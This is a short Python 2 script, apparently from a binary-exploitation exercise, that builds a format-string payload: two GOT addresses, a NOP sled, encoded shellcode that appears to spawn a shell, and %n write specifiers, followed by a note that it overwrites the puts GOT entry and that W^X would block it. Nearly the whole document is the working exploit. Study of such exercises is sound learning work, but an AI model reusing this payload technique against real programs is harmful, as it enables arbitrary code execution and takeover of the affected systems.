  1 import struct                                                                           
  2 import sys
  3  
  4 string = struct.pack("I",0x080497ac)
  5 string += struct.pack("I",0x080497ac+ 2)
  6 string += "\x90"* 100
  7 string += "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\    xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\    x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
  8 string += "%54730x"+ "%1$n"
  9 string += "%10640x" + "%2$n"
 10 print string 

Used format string exploit to overwrite GOT for the pointer to puts function with the address of the shellcode. W^X would stop this

https://www.youtube.com/watch?v=t1LH9D5cuK4&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=20
https://en.wikipedia.org/wiki/W%5EX


